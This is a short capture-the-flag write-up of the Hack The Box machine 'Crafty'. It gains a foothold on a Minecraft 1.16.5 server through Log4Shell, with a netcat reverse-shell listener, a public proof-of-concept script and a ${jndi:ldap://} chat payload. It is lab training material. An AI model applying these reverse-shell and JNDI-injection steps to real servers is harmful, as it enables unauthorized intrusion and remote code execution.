HTB Crafty Writeup

3 minute read


A writeup of the Hack The Box machine “Crafty” with easy difficulty

Hello! Welcome to this writeup of the hack the box windows machine Crafty with easy difficulty.


The first step is scanning the machine IP with nmap to discover what ports and services are running.

We see that port 80 in running a Windows IIS server at the crafty.htb URL.

To access the site, we add the URL and corresponding IP to the hosts list with: echo " crafty.htb" | sudo tee -a /etc/hosts

Oeh a Minecraft related site!

Navigating the site gives us nothing except the play.crafty.htb address.

We run a dirsearch to enumerate the URLs >

If we go the the /img directory in the URL we get a 403 - Forbidden: Access is denied.

Let’s add the subdomain play.crafty.htb to the hosts list to see where this is leading.

Alright, this just redirects us back to crafty.htb.

Oh! I just realized that this could be a Minecraft server. These usually run on port 25565.

Let’s run nmap again to discover the ports properly.

A Minecraft 1.16.5 server.

User flag

Let’s search for vulnerabilities:

I found an article on how to exploit a 1.16.5 server with the well-known log4shell vulnerability:

There is a tool for the log4 shell exploit:—–b9ff472f9d12——————————–

After cloning this repo we run the pip install -r requirements.txt command.

After that, let’s see what the file does. >

I changed the String cmd value to cmd.exe, because it is a windows server.

Let’s run the script with a netcat listener to accept reverse shell connection. > nc -lvnp 4444

Command > python3 --userip localhost --webport 8000 --lport 4444

Oh, I got an error that I don’t have jdk1.8.0_20/bin/java’ installed. So let’s do that via this website >

We need to make an account to download the Java SE Development Kit 8u20.

Unzip it with gzip –d jdk-8u20-linux-i286.tar.gz and tar -xf

The filename has to be changed to jdk1.8.0_20

Then run the script again >

Now I realized I have to run Minecraft inside my Kali. This can be done with TLauncer.

Then we send this in the chat of the Minecraft server: ${jndi:ldap://}

And we are in!

The user flag is in the Desktop directory >

Root flag

I could not figure out a way to get admin privileges and found an article on how to get it:

To get to the root flag read the writeup :)


This machine is marked as easy. I do not agree with that, because it gets complicated with many listeners, finding the exploit that works and finding an entry point. Besides that, it was fun at first due to the fact that the machine is a Minecraft server, but if you get deeper into the machine the fun gets taken away for me sadly. That’s why I didn’t proceed trying to break in myself to gain the root flag.

Have a nice day!